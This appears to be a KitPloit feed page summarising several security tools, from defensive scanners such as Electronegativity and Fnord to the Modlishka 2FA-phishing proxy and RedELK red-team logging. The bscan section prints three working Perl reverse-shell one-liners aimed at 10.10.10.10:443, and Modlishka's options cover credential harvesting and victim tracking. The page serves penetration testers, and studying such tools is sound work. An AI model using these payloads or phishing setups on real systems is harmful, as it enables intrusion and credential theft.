Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5847 articles
Browse latest View live

Electronegativity - Tool To Identify Misconfigurations And Security Anti-Patterns In Electron Applications

$
0
0

Electronegativity is a tool to identify misconfigurations and security anti-patterns in Electron-based applications.
It leverages AST and DOM parsing to look for security-relevant configurations, as described in the "Electron Security Checklist - A Guide for Developers and Auditors" whitepaper.
Software developers and security auditors can use this tool to detect and mitigate potential weaknesses and implementation bugs when developing applications using Electron. A good understanding of Electron (in)security is still required when using Electronegativity, as some of the potential issues detected by the tool require manual investigation.
If you're interested in Electron Security, have a look at our BlackHat 2017 research Electronegativity - A Study of Electron Security and keep an eye on the Doyensec's blog.

Installation
Major releases are pushed to NPM and can be simply installed using:
$ npm install @doyensec/electronegativity -g

Usage
$ electronegativity -h
OptionDescription
-Voutput the version number
-i, --inputinput (directory, .js, .htm, .asar)
-o, --outputsave the results to a file in csv or sarif format
-h, --helpoutput usage information
Using electronegativity to look for issues in a directory containing an Electron app:
$ electronegativity -i /path/to/electron/app
Using electronegativity to look for issues in an asar archive and saving the results in a csv file:
$ electronegativity -i /path/to/asar/archive -o result.csv
Note: if you're running into the Fatal Error "JavaScript heap out of memory", you can run node using node --max-old-space-size=4096 electronegativity -i /path/to/asar/archive -o result.csv

Credits
Electronegativity was made possible thanks to the work of Claudio Merloni, Ibram Marzouk, Jaroslav Lobačevski and many other contributors.
This work has been sponsored by Doyensec LLC.



Modlishka - An Open Source Phishing Tool With 2FA Authentication

$
0
0

Modlishka is a flexible and powerful reverse proxy, that will take your phishing campaigns to the next level (with minimal effort required from your side).
Enjoy :-)

Features
Some of the most important 'Modlishka' features :
  • Support for majority of 2FA authentication schemes (by design).
  • No website templates (just point Modlishka to the target domain - in most cases, it will be handled automatically).
  • Full control of "cross" origin TLS traffic flow from your victims browsers.
  • Flexible and easily configurable phishing scenarios through configuration options.
  • Pattern based JavaScript payload injection.
  • Striping website from all encryption and security headers (back to 90's MITM style).
  • User credential harvesting (with context based on URL parameter passed identifiers).
  • Can be extended with your ideas through plugins.
  • Stateless design. Can be scaled up easily for an arbitrary number of users - ex. through a DNS load balancer.
  • Web panel with a summary of collected credentials and user session impersonation (beta).
  • Written in Go.

Action
"A picture is worth a thousand words":
Modlishka in action against an example 2FA (SMS) enabled authentication scheme:


Note: google.com was chosen here just as a POC.

Installation
Latest source code version can be fetched from here (zip) or here (tar).
Fetch the code with 'go get' :
$ go get -u github.com/drk1wi/Modlishka
Compile the binary and you are ready to go:
$ cd $GOPATH/src/github.com/drk1wi/Modlishka/
$ make


# ./dist/proxy -h


Usage of ./dist/proxy:

-cert string
base64 encoded TLS certificate

-certKey string
base64 encoded TLS certificate key

-certPool string
base64 encoded Certification Authority certificate

-config string
JSON configuration file. Convenient instead of using command line switches.

-credParams string
Credential regexp collector with matching groups. Example: base64(username_regex),base64(password_regex)

-debug
Print debug information

-disableSecurity
Disable security features like anti-SSRF. Disable at your own risk.

-jsRules string
Comma separated list of URL patterns and JS base64 encoded payloads that will be injected.

-listeningAddress string
Listening address (default "127.0.0.1")

-listeningPort string
Listening port (default "443")

-log string
Local file to which fetched requests will be written (appended)

-phishing string
Phishing domain to create - Ex.: target.co

-plugins string
Comma seperated list of enabled plugin names (default "all")

-postOnly
Log only HTTP POST requests

-rules string
Comma separated list of 'string' patterns and their replacements.

-target string
Main target to proxy - Ex.: https://target.com

-targetRes string
Comma separated list of target subdomains that need to pass through the proxy

-terminateTriggers string
Comma separated list of URLs from target's origin which will trigger session termination

-terminateUrl string
URL to redirect the client after session termination triggers

-tls
Enable TLS (default false)

-trackingCookie string
Name of the HTTP cookie used to track the victim (default "id")

-trackingParam string
Name of the HTTP parameter used to track the victim (default "id")

Usage
  • Check out the wiki page for a more detailed overview of the tool usage.
  • FAQ (Frequently Asked Questions)
  • Blog post

Credits
Thanks for helping with the code go to Giuseppe Trotta (@Giutro)


Fwknop - Single Packet Authorization & Port Knocking

$
0
0

fwknop implements an authorization scheme known as Single Packet Authorization (SPA) for strong service concealment. SPA requires only a single packet which is encrypted, non-replayable, and authenticated via an HMAC in order to communicate desired access to a service that is hidden behind a firewall in a default-drop filtering stance. The main application of SPA is to use a firewall to drop all attempts to connect to services such as SSH in order to make the exploitation of vulnerabilities (both 0-day and unpatched code) more difficult. Because there are no open ports, any service that is concealed by SPA naturally cannot be scanned for with Nmap. The fwknop project supports four different firewalls: iptables, firewalld, PF, and ipfw across Linux, OpenBSD, FreeBSD, and Mac OS X. There is also support for custom scripts so that fwknop can be made to support other infrastructure such as ipset or nftables.

SPA is essentially next generation Port Knocking (PK), but solves many of the limitations exhibited by PK while retaining its core benefits. PK limitations include a general difficulty in protecting against replay attacks, asymmetric ciphers and HMAC schemes are not usually possible to reliably support, and it is trivially easy to mount a DoS attack against a PK server just by spoofing an additional packet into a PK sequence as it traverses the network (thereby convincing the PK server that the client doesn't know the proper sequence). All of these shortcomings are solved by SPA. At the same time, SPA hides services behind a default-drop firewall policy, acquires SPA data passively (usually via libpcap or other means), and implements standard cryptographic operations for SPA packet authentication and encryption/decryption.
SPA packets generated by fwknop leverage HMAC for authenticated encryption in the encrypt-then-authenticate model. Although the usage of an HMAC is currently optional (enabled via the --use-hmaccommand line switch), it is highly recommended for three reasons:
  1. Without an HMAC, cryptographically strong authentication is not possible with fwknop unless GnuPG is used, but even then an HMAC should still be applied.
  2. An HMAC applied after encryption protects against cryptanalytic CBC-mode padding oracle attacks such as the Vaudenay attack and related trickery (like the more recent "Lucky 13" attack against SSL).
  3. The code required by the fwknopd daemon to verify an HMAC is much more simplistic than the code required to decrypt an SPA packet, so an SPA packet without a proper HMAC isn't even sent through the decryption routines.
The final reason above is why an HMAC should still be used even when SPA packets are encrypted with GnuPG due to the fact that SPA data is not sent through libgpgme functions unless the HMAC checks out first. GnuPG and libgpgme are relatively complex bodies of code, and therefore limiting the ability of a potential attacker to interact with this code through an HMAC operation helps to maintain a stronger security stance. Generating an HMAC for SPA communications requires a dedicated key in addition to the normal encryption key, and both can be generated with the --key-gen option.
fwknop encrypts SPA packets either with the Rijndael block cipher or via GnuPG and associated asymmetric cipher. If the symmetric encryption method is chosen, then as usual the encryption key is shared between the client and server (see the /etc/fwknop/access.conf file for details). The actual encryption key used for Rijndael encryption is generated via the standard PBKDF1 key derivation algorithm, and CBC mode is set. If the GnuPG method is chosen, then the encryption keys are derived from GnuPG key rings.

Use Cases
People who use Single Packet Authorization (SPA) or its security-challenged cousin Port Knocking (PK) usually access SSHD running on the same system where the SPA/PK software is deployed. That is, a firewall running on a host has a default-drop policy against all incoming SSH connections so that SSHD cannot be scanned, but a SPA daemon reconfigures the firewall to temporarily grant access to a passively authenticated SPA client:


"Basic SPA usage to access SSHD"
fwknop supports the above, but also goes much further and makes robust usage of NAT (for iptables/firewalld firewalls). After all, important firewalls are usually gateways between networks as opposed to just being deployed on standalone hosts. NAT is commonly used on such firewalls (at least for IPv4 communications) to provide Internet access to internal networks that are on RFC 1918 address space, and also to allow external hosts access to services hosted on internal systems.
Because fwknop integrates with NAT, SPA can be leveraged to access internal services through the firewall by users on the external Internet. Although this has plenty of applications on modern traditional networks, it also allows fwknop to support cloud computing environments such as Amazon's AWS:


"SPA usage on Amazon AWS cloud environments"

User Interface
The official cross-platform fwknop client user interface fwknop-gui (download, github) is developed by Jonathan Bennett. Most major client-side SPA modes are supported including NAT requests, HMAC and Rijndael keys (GnuPG is not yet supported), fwknoprc stanza saving, and more. Currently fwknop-gui runs on Linux, Mac OS X, and Windows - here is a screenshot from OS X:


  "fwknop-gui on Mac OS X" Similarly, an updated Android client is available as well.

Tutorial
A comprehensive tutorial on fwknop can be found here:
http://www.cipherdyne.org/fwknop/docs/fwknop-tutorial.html

Features
The following is a complete list of features supported by the fwknop project:
  • Implements Single Packet Authorization around iptables and firewalld firewalls on Linux, ipfw firewalls on *BSD and Mac OS X, and PF on OpenBSD.
  • The fwknop client runs on Linux, Mac OS X, *BSD, and Windows under Cygwin. In addition, there is an Android app to generate SPA packets.
  • Supports both Rijndael and GnuPG methods for the encryption/decryption of SPA packets.
  • Supports HMAC authenticated encryption for both Rijndael and GnuPG. The order of operation is encrypt-then-authenticate to avoid various cryptanalytic problems.
  • Replay attacks are detected and thwarted by SHA-256 digest comparison of valid incoming SPA packets. Other digest algorithms are also supported, but SHA-256 is the default.
  • SPA packets are passively sniffed from the wire via libpcap. The fwknopd server can also acquire packet data from a file that is written to by a separate Ethernet sniffer (such as with tcpdump -w <file>), from the iptables ULOG pcap writer, or directly via a UDP socket in --udp-server mode.
  • For iptables firewalls, ACCEPT rules added by fwknop are added and deleted (after a configurable timeout) from custom iptables chains so that fwknop does not interfere with any existing iptables policy that may already be loaded on the system.
  • Supports inbound NAT connections for authenticated SPA communications (iptables firewalls only for now). This means fwknop can be configured to create DNAT rules so that you can reach a service (such as SSH) running on an internal system on an RFC 1918 IP address from the open Internet. SNAT rules are also supported which essentially turns fwknopd into a SPA-authenticating gateway to access the Internet from an internal network.
  • Multiple users are supported by the fwknop server, and each user can be assigned their own symmetric or asymmetric encryption key via the /etc/fwknop/access.conf file.
  • Automatic resolution of external IP address via https://www.cipherdyne.org/cgi-bin/myip (this is useful when the fwknop client is run from behind a NAT device). Because the external IP address is encrypted within each SPA packet in this mode, Man-in-the-Middle (MITM) attacks where an inline device intercepts an SPA packet and only forwards it from a different IP in an effort to gain access are thwarted.
  • Port randomization is supported for the destination port of SPA packets as well as the port over which the follow-on connection is made via the iptables NAT capabilities. The later applies to forwarded connections to internal services and to access granted to local sockets on the system running fwknopd.
  • Integration with Tor (as described in this DefCon 14 presentation). Note that because Tor uses TCP for transport, sending SPA packets through the Tor network requires that each SPA packet is sent over an established TCP connection, so technically this breaks the "single" aspect of "Single Packet Authorization". However, Tor provides anonymity benefits that can outweigh this consideration in some deployments.
  • Implements a versioned protocol for SPA communications, so it is easy to extend the protocol to offer new SPA message types and maintain backwards compatibility with older fwknop clients at the same time.
  • Supports the execution of shell commands on behalf of valid SPA packets.
  • The fwknop server can be configured to place multiple restrictions on inbound SPA packets beyond those enforced by encryption keys and replay attack detection. Namely, packet age, source IP address, remote user, access to requested ports, and more.
  • Bundled with fwknop is a comprehensive test suite that issues a series of tests designed to verify that both the client and server pieces of fwknop work properly. These tests involve sniffing SPA packets over the local loopback interface, building temporary firewall rules that are checked for the appropriate access based on the testing config, and parsing output from both the fwknop client and fwknopd server for expected markers for each test. Test suite output can easily be anonymized for communication to third parties for analysis.
  • fwknop was the first program to integrate port knocking with passive OS fingerprinting. However, Single Packet Authorization offers many security benefits beyond port knocking, so the port knocking mode of operation is generally deprecated.

Building fwknop
This distribution uses GNU autoconf for setting up the build. Please see the INSTALL file for the general basics on using autoconf.
There are some "configure" options that are specific to fwknop. They are (extracted from ./configure --help):
  --disable-client        Do not build the fwknop client component. The
default is to build the client.
--disable-server Do not build the fwknop server component. The
default is to build the server.
--with-gpgme support for gpg encryption using libgpgme
[default=check]
--with-gpgme-prefix=PFX prefix where GPGME is installed (optional)
--with-gpg=/path/to/gpg Specify path to the gpg executable that gpgme will
use [default=check path]
--with-firewalld=/path/to/firewalld
Specify path to the firewalld executable
[default=check path]
--with-iptables=/path/to/iptables
Specify path to the iptables executable
[default=check path]
--with-ipfw=/path/to/ipfw
Specify path to the ipfw executable [default=check
path]
--with-pf=/path/to/pfctl
Specify path to the pf executable [default=check
path]
--with-ipf=/path/to/ipf Specify path to the ipf executable [default=check
path]

Examples:

./configure --disable-client --with-firewalld=/bin/firewall-cmd
./configure --disable-client --with-iptables=/sbin/iptables --with-firewalld=no


Netsniff-Ng - A Swiss Army Knife For Your Daily Linux Network Plumbing

$
0
0

netsniff-ng is a free Linux networking toolkit, a Swiss army knife for your daily Linux network plumbing if you will.
Its gain of performance is reached by zero-copy mechanisms, so that on packet reception and transmission the kernel does not need to copy packets from kernel space to user space and vice versa.
Our toolkit can be used for network development and analysis, debugging, auditing or network reconnaissance.

The netsniff-ng toolkit consists of the following utilities:
  • netsniff-ng, a fast zero-copy analyzer, pcap capturing and replaying tool
  • trafgen, a multithreaded low-level zero-copy network packet generator
  • mausezahn, high-level packet generator for HW/SW appliances with Cisco-CLI*
  • bpfc, a Berkeley Packet Filter compiler, Linux BPF JIT disassembler
  • ifpps, a top-like kernel networking statistics tool
  • flowtop, a top-like netfilter connection tracking tool
  • curvetun, a lightweight curve25519-based IP tunnel
  • astraceroute, an autonomous system (AS) trace route utility
Get it via Git:   git clone git://github.com/netsniff-ng/netsniff-ng.git


Tools

netsniff-ng is a fast network analyzer based on packet mmap(2) mechanisms. It can record pcap files to disc, replay them and also do an offline and online analysis. Capturing, analysis or replay of raw 802.11 frames are supported as well. pcap files are also compatible with tcpdump or Wireshark traces. netsniff-ng processes those pcap traces either in scatter-gather I/O or by mmap(2) I/O.
trafgen is a multi-threaded network traffic generator based on packet mmap(2) mechanisms. It has its own flexible, macro-based low-level packet configuration language. Injection of raw 802.11 frames are supported as well. trafgen has a significantly higher speed than mausezahn and comes very close to pktgen, but runs from user space. pcap traces can also be converted into a trafgen packet configuration.
mausezahn is a high-level packet generator that can run on a hardware-software appliance and comes with a Cisco-like CLI. It can craft nearly every possible or impossible packet. Thus, it can be used, for example, to test network behaviour under strange circumstances (stress test, malformed packets) or to test hardware-software appliances for several kind of attacks.
bpfc is a Berkeley Packet Filter (BPF) compiler that understands the original BPF language developed by McCanne and Jacobson. It accepts BPF mnemonics and converts them into kernel/netsniff-ng readable BPF ``opcodes''. It also supports undocumented Linux filter extensions. This can especially be useful for more complicated filters, that high-level filters fail to support.
ifpps is a tool which periodically provides top-like networking and system statistics from the Linux kernel. It gathers statistical data directly from procfs files and does not apply any user space traffic monitoring that would falsify statistics on high packet rates. For wireless, data about link connectivity is provided as well.
flowtop is a top-like connection tracking tool that can run on an end host or router. It is able to present TCP or UDP flows that have been collected by the kernel's netfilter framework. GeoIP and TCP state machine information is displayed. Also, on end hosts flowtop can show PIDs and application names that flows relate to. No user space traffic monitoring is done, thus all data is gathered by the kernel.
curvetun is a lightweight, high-speed ECDH multiuser tunnel for Linux. curvetun uses the Linux TUN/TAP interface and supports {IPv4,IPv6} over {IPv4,IPv6} with UDP or TCP as carrier protocols. Packets are encrypted end-to-end by a symmetric stream cipher (Salsa20) and authenticated by a MAC (Poly1305), where keys have previously been computed with the ECDH key agreement protocol (Curve25519).
astraceroute is an autonomous system (AS) trace route utility. Unlike traceroute or tcptraceroute, it not only display hops, but also their AS information they belong to as well as GeoIP information and other interesting things. On default, it uses a TCP probe packet and falls back to ICMP probes in case no ICMP answer has been received.
Concluding, the toolkit is split into small, useful utilities that are or are not necessarily related to each other. Each program for itself fills a gap as a helper in your daily network debugging, development or audit.  

Fnord - Pattern Extractor For Obfuscated Code

$
0
0

Fnord is a pattern extractor for obfuscated code

Description
Fnord has two main functions:
  1. Extract byte sequences and create some statistics
  2. Use these statistics, combine length, number of occurrences, similarity and keywords to create a YARA rule

1. Statistics
Fnord processes the file with a sliding window of varying size to extract all sequences of with a minimum length -m X (default: 4) up to a maximum length -x X (default: 40). For each length, Fnord will present the most frequently occurring sequences -t X (default: 3) in a table.
Each line in the table contains:
  • Length
  • Number of occurrences
  • Sequence (string)
  • Formatted (ascii/wide/hex)
  • Hex encoded form
  • Entropy

2. YARA Rule Creation
Fnord also generates an experimental YARA rule. During YARA rule creation it will calculate a score based in the length of the sequence and the number of occurrences (length * occurrences). It will then process each sequences by removing all non-letter characters and comparing them with a list of keywords (case-insensitive) to detect sequences that are more interesting than others. Before writing each string to the rule Fnord calculates a Levenshtein distance and skips sequences that are too similar to sequences that have already been integrated in the rule.

Status
[Experimental] Fnord was created a few days ago and I have tested it with a handful of samples. My guess is that I'll adjust the defaults in the coming weeks and add some more keywords, filters, scoring options.

Improve the Results
If you've found obfuscated code in a sample, use a hex editor to extract the obfuscated section of the sample and save to a new file. Use that new file for the analysis.
Play with the flags -s, -k, -r, --yara-strings, -mand-e`.
Please send me samples that produce weak YARA rules that could be better.

Usage
        ____                 __
/ __/__ ___ _______/ /
/ _// _ \/ _ \/ __/ _ /
/_/ /_//_/\___/_/ \_,_/ Pattern Extractor for Obfuscated Code
v0.6, Florian Roth

usage: fnord.py [-h] [-f file] [-m min] [-x max] [-t top] [-n min-occ]
[-e min-entropy] [--strings] [--include-padding] [--debug]
[--noyara] [-s similarity] [-k keywords-multiplier]
[-r structure-multiplier] [-c count-limiter] [--yara-exact]
[--yara-strings max] [--show-score] [--show-count]
[--author author]

Fnord - Pattern Extractor for Obfuscated Code

optional arguments:
-h, --help show this help message and exit
-f file File to process
-m min Minimum sequence length
-x max Maximum sequence length
-t top Number of items in the Top x list
-n min-occ Minimum number of occurrences to show
-e min-entropy Minimum entropy
--strings Show strings only
--include-padding Include 0x00 and 0x20 in the extracted strings
--debug Debug output

YARA Rule Creation:
--noyara Do not generate an experimental YARA rule
-s similarity Allowed similarity (use values between 0.1=low and
10=high, default=1.5)
-k keywords-multiplier
Keywords multiplier (multiplies score of sequences if
keyword is found) (best use values between 1 and 5,
default=2.0)
-r structure-multiplier
Structure multiplier (multiplies score of sequences if
it is identified as code structure and not payload)
(best use values between 1 and 5, default=2.0)
-c count-limiter Count limiter (limts the impact of the count by
capping it at a certain amount) (best use values
between 5 and 100, default=20)
--yara-exact Add magic header and magic footer limitations to the
rule
--yara-strings max Maximum sequence length
--show-score Show score in comments of YARA rules
--show-count Show count in sample in comments of YARA rules
--author author YARA rule author

Getting Started
  1. git clone https://github.com/Neo23x0/Fnord.git and cd Fnord
  2. pip3 install -r ./requirements.txt
  3. python3 ./fnord.py --help

Examples
python3 fnord.py -f ./test/wraeop.sct --yara-strings 10
python3 fnord.py -f ./test/vbs.txt --show-score --show-count -t 1 -x 20
python3 fnord.py -f ./test/inv-obf.txt --show-score --show-count -t 1 --yara-strings 4 --yara-exact

Screenshots




FAQs

Why didn't you integrate Fnord in yarGen?
yarGen uses a white-listing approach to filter the strings that are best for the creation of a YARA rule. yarGen applies some regular expressions to adjust scores of strings before creating the YARA rules. But its approach is very different to the method used by Fnord, which calculates the score of the byte sequences based on statistics.
While yarGen is best used for un-obfuscated code. Fnord is for obfuscated code only and should produce much better results than yarGen.

Contact
Follow on Twitter for updates @cyb3rops


Bincat - Binary Code Static Analyser, With IDA Integration

$
0
0

BinCAT is a static Binary Code Analysis Toolkit, designed to help reverse engineers, directly from IDA.
It features:
  • value analysis (registers and memory)
  • taint analysis
  • type reconstruction and propagation
  • backward and forward analysis
  • use-after-free and double-free detection

In action
You can check (an older version of) BinCAT in action here:
Check the tutorial out to see the corresponding tasks.

Quick FAQ
Supported host platforms:
  • IDA plugin: all, version 6.9 or later (BinCAT uses PyQt, not PySide)
  • analyzer (local or remote): Linux, Windows, macOS (maybe)
Supported CPU for analysis (for now):
  • x86-32
  • ARMv7
  • ARMv8
  • PowerPC

Installation
Only IDA v6.9 or later (7 included) are supported

Binary distribution install (recommended)
The binary distribution includes everything needed:
  • the analyzer
  • the IDA plugin
Install steps:
  • Extract the binary distribution of BinCAT (not the git repo)
  • In IDA, click on "File -> Script File..." menu (or type ALT-F7)
  • Select install_plugin.py
  • BinCAT is now installed in your IDA user dir
  • Restart IDA

Manual installation

Analyzer
The analyzer can be used locally or through a Web service.
On Linux:
On Windows:

IDA Plugin
BinCAT should work with IDA on Wine, once pip is installed:

Using BinCAT

Quick start
  • Load the plugin by using the Ctrl-Shift-B shortcut, or using the Edit -> Plugins -> BinCAT menu
  • Go to the instruction where you want to start the analysis
  • Select the BinCAT Configuration pane, click <-- Current to define the start address
  • Launch the analysis

Configuration
Global options can be configured through the Edit/BinCAT/Options menu.
Default config and options are stored in $IDAUSR/idabincat/conf.

Options
  • "Use remote bincat": select if you are running docker in a Docker container
  • "Remote URL": http://localhost:5000 (or the URL of a remote BinCAT server)
  • "Autostart": autoload BinCAT at IDA startup
  • "Save to IDB": default state for the save to idb checkbox

Documentation
A manual is provided and check here for a description of the configuration file format.
A tutorial is provided to help you try BinCAT's features.

Article and presentations about BinCAT



Bscan - An Asynchronous Target Enumeration Tool

$
0
0


Synopsis
bscan is a command-line utility to perform active information gathering and service enumeration. At its core, bscan asynchronously spawns processes of well-known scanning utilities, repurposing scan results into highlighted console output and a well-defined directory structure.

Installation
bscan was written to be run on Kali Linux, but there is nothing inherently preventing it from running on any OS with the appropriate tools installed.
Download the latest packaged version from PyPI:
pip install bscan
Or get the bleeding-edge version from version control:
pip install https://github.com/welchbj/bscan/archive/master.tar.gz

Basic Usage
bscan has a wide variety of configuration options which can be used to tune scans to your needs. Here's a quick example:
$ bscan \
> --max-concurrency 3 \
> --patterns [Mm]icrosoft \
> --status-interval 10 \
> --verbose-status \
> scanme.nmap.org
What's going on here?
  • --max-concurrency 3 means that no more than 3 concurrent scan subprocesses will be run at a time
  • --patterns [Mm]icrosoft defines a custom regex pattern with which to highlight matches in the generated scan output
  • --status-interval 10 tells bscan to print runtime status updates every 10 seconds
  • --verbose-status means that each of these status updates will print details of all currently-running scan subprocesses
  • scanme.nmap.org is the host upon which we want to enumerate
bscan also relies on some additional configuration files. The default files can be found in the bscan/configuation directory and serve the following purposes:
  • patterns.txt specifies the regex patterns to be highlighted in console output when matched with scan output
  • required-programs.txt specifies the installed programs that bscan plans on using
  • port-scans.toml defines the port-discovering scans to be run on the target(s), as well as the regular expressions used to parse port numbers and service names from scan output
  • service-scans.toml defines the scans be run on the target(s) on a per-service basis

Detailed Options
Here's what you should see when running bscan --help:
usage: bscan [OPTIONS] targets

_
| |__ ___ ___ __ _ _ __
| '_ \/ __|/ __/ _` | '_ \
| |_) \__ \ (__ (_| | | | |
|_.__/|___/\___\__,_|_| |_|

an asynchronous service enumeration tool

positional arguments:
targets the targets and/or networks on which to perform enumeration

optional arguments:
-h, --help show this help message and exit
--brute-pass-list F filename of password list to use for brute-forcing
--brute-user-list F filename of user list to use for brute-forcing
--cmd-print-width I the maximum integer number of characters allowed when printing
the command used to spawn a running subprocess (defaults to 80)
--config-dir D the base directory from which to load the configuration files;
required configuration files missing from this directory will
instead be loaded from the default files shipped with this
program
--hard force overwrite of existing directories
--max-concurrency I maximum integer number of subprocesses permitted to be running
concurrently (defaults to 20)
--no-program-check disable checking the presence of required system programs
--no-file-check disable checking the presence of files such as configured
wordlists
--no-service-scans disable running scans on discovered services
--output-dir D the base directory in which to write output files
--patterns [ [ ...]] regex patterns to highlight in output text
--ping-sweep enable ping sweep filtering of hosts from a network range
before running more intensive scans
--quick-only whether to only run the quick scan (and not include the
thorough scan over all ports)
--qs-method S the method for performing the initial TCP port scan; must
correspond to a configured port scan
--status-interval I integer number of seconds to pause in between printing status
updates; a non-positive value disables updates (defaults to 30)
--ts-method S the method for performing the thorough TCP port scan; must
correspond to a configured port scan
--udp whether to run UDP scans
--udp-method S the method for performing the UDP port scan; must correspond
to a configured port scan
--verbose-status whether to print verbose runtime status updates, based on
frequency specified by `--status-interval` flag
--version program version
--web-word-list F the wordlist to use for scans

Companion Tools
The main bscan program ships with two utility programs (bscan-wordlists and bscan-shells) to make your life a little easier when looking for wordlists and trying to open reverse shells.
bscan-wordlists is a program designed for finding wordlist files on Kali Linux. It searches a few default directories and allows for glob filename matching. Here's a simple example:
$ bscan-wordlists --find "*win*"
/usr/share/wordlists/wfuzz/vulns/dirTraversal-win.txt
/usr/share/wordlists/metasploit/sensitive_files_win.txt
/usr/share/seclists/Passwords/common-passwords-win.txt
Try bscan-wordlists --help to explore other options.
bscan-shells is a program that will generate a variety of reverse shell one-liners with target and port fields populated for you. Here's a simple example to list all Perl-based shells, configured to connect back to 10.10.10.10 on port 443:
$ bscan-shells --port 443 10.10.10.10 | grep -i -A1 perl
perl for windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

perl with /bin/sh
perl -e 'use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl without /bin/sh
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Note that bscan-shells pulls these commands from the reverse-shells.toml configuration file. Try bscan-shells --help to explore other options.

Development
Start by setting up a new development environment and installing the requirements (using virtualenvwrapper / virtualenvwrapper-win):
# setup the environment
mkvirtualenv -p $(which python3) bscan-dev
workon bscan-dev

# get the deps
pip install -r dev-requirements.txt
Lint and type-check the project (these are run on Travis, too):
flake8 . && mypy bscan
When it's time to package a new release:
# build source and wheel distributions
python setup.py bdist_wheel sdist

# run post-build checks
twine check dist/*

# upload to PyPI
twine upload dist/*


RedELK - Easy Deployable Tool For Red Teams Used For Tracking And Alarming About Blue Team Activities As Well As Better Usability In Long Term Operations

$
0
0

Red Team's SIEM - easy deployable tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability for the Red Team in long term operations.
Initial public release at BruCON 2018:

Goal of the project
Short: a Red Team's SIEM.
Longer: a Red Team's SIEM that serves three goals:
  1. Enhanced usability and overview for the red team operators by creating a central location where all relevant operational logs from multiple teamservers are collected and enriched. This is great for historic searching within the operation as well as giving a read-only view on the operation (e.g. for the White Team). Especially useful for multi-scenario, multi-teamserver, multi-member and multi-month operations. Also, super easy ways for viewing all screenshots, IOCs, keystrokes output, etc. \o/
  2. Spot the Blue Team by having a central location where all traffic logs from redirectors are collected and enriched. Using specific queries its now possible to detect that the Blue Team is investigating your infrastructure.
  3. Out-of-the-box usable by being easy to install and deploy, as well as having ready made views, dashboards and alarms.
Here's a conceptual overview of how RedELK works.


RedELK uses the typical components Filebeat (shipping), Logstash (filtering), Elasticsearch (storage) and Kibana (viewing). Rsync is used for a second syncing of teamserver data: logs, keystrokes, screenshots, etc. Nginx is used for authentication to Kibana, as well as serving the screenshots, beaconlogs, keystrokes in an easy way in the operator's browser.
A set of python scripts are used for heavy enriching of the log data, and for for Blue Team detection.

Supported tech and requirements
RedELK currently supports:
  • Cobalt Strike teamservers
  • HAProxy for HTTP redirector data. Apache support is expected soon.
  • Tested on Ubuntu 16 LTS
RedELK requires a modification to the default haproxy configuration in order to log more details.
In the 'general' section:
log-format frontend:%f/%H/%fi:%fp\ backend:%b\ client:%ci:%cp\ GMT:%T\ useragent:%[capture.req.hdr(1)]\ body:%[capture.req.hdr(0)]\ request:%r
At 'frontend' section:
declare capture request len 40000
http-request capture req.body id 0
capture request header User-Agent len 512

Installation
First time installation
Adjust ./certs/config.cnf to include the right details for the TLS certificates. Once done, run: initial-setup.sh This will create a CA, generate necessary certificates for secure communication between redirs, teamserver and elkserver and generates a SSH keypair for secure rsync authentication of the elkserver to the teamserver. It also generates teamservers.tgz, redirs.tgz and elkserver.tgz that contain the installation packages for each component. Rerunning this initial setup is not required. But if you want new certificates for a new operation, you can simply run this again.
Installation of redirectors
Copy and extract redirs.tgz on your redirector as part of your red team infra deployment procedures. Run: install-redir.sh $FilebeatID $ScenarioName $IP/DNS:PORT
  • $FilebeatID is the identifier of this redirector within filebeat.
  • $ScenarioName is the name of the attack scenario this redirector is used for.
  • $IP/DNS:PORT is the IP or DNS name and port where filebeat logs are shipped to.
This script will set the timezone (default Europe/Amsterdam), install filebeat and dependencies, install required certificates, adjust the filebeat configuration and start filebeat.
Installation of teamserver
Copy and extract teamservers.tgz on your Cobalt Strike teamserver as part of your red team infra deployment procedures. Run: install-teamserver.sh $FilebeatID $ScenarioName $IP/DNS:PORT
  • $FilebeatID is the identifier of this teamserver within filebeat.
  • $ScenarioName is the name of the attack scenario this teamserver is used for.
  • $IP/DNS:PORT is the IP or DNS name and port where filebeat logs are shipped to.
This script will warn if filebeat is already installed (important as ELK and filebeat sometimes are very picky about having equal versions), set the timezone (default Europe/Amsterdam), install filebeat and dependencies, install required certificates, adjust the filebeat configuration, start filebeat, create a local user 'scponly' and limit that user to SSH key-based auth via scp/sftp/rsync.
Installation of ELK server
Copy and extract elkserver.tgz on your RedELK server as part of your red team infra deployment procedures. Run: install-teamserver.sh This script will set the timezone (default Europe/Amsterdam), install logstash, elasticsearch, kibana and dependencies, install required certificates, deploy the logstash configuration and required custom ruby enrichment scripts, download GeoIP databases, install Nginx, configure Nginx, create a local user 'redelk' with the earlier generated SSH keys, install the script for rsyncing of remote logs on teamservers, install the script used for creating of thumbnails of screenshots, install the RedELK configuration files, install crontab file for RedELK tasks, install GeoIP elasticsearch plugins and adjust the template, install the python enrichment scripts, and finally install the python blue team detection scripts.
You are not done yet. You need to manually enter the details of your teamservers in /etc/cron.d/redelk, as well as tune the config files in /etc/redelk (see section below).
Setting up enrichment and detection
On the ELK server in the /etc/redelk directory you can find several files that you can use to tune your RedELK instance for better enrichments and better alarms. These files are:
  • /etc/redelk/iplist_customer.conf : public IP addresses of your target, one per line. Including an address here will set a tag for applicable records in the redirhaproxy-* index.
  • /etc/redelk/iplist_redteam.conf : public IP addresses of your red team, one per line. Convenient for identifying testing done by red team members. Including an address here will set a tag for applicable records in the redirhaproxy-* index.
  • /etc/redelk/iplist_unknown.conf : public IP addresses of gateways that you are not sure about yet, but don't want to be warned about again. One per line. Including an address here will set a tag for applicable records in the redirhaproxy-* index.
  • /etc/redelk/known_sandboxes.conf : beacon characteristics of known AV sandbox systems. One per line. Including data here here will set a tag for applicable records in the rtops-* index.
  • /etc/redelk/known_testsystems.conf : beacon characteristics of known test systems. One per line. Including data here here will set a tag for applicable records in the rtops-* index.
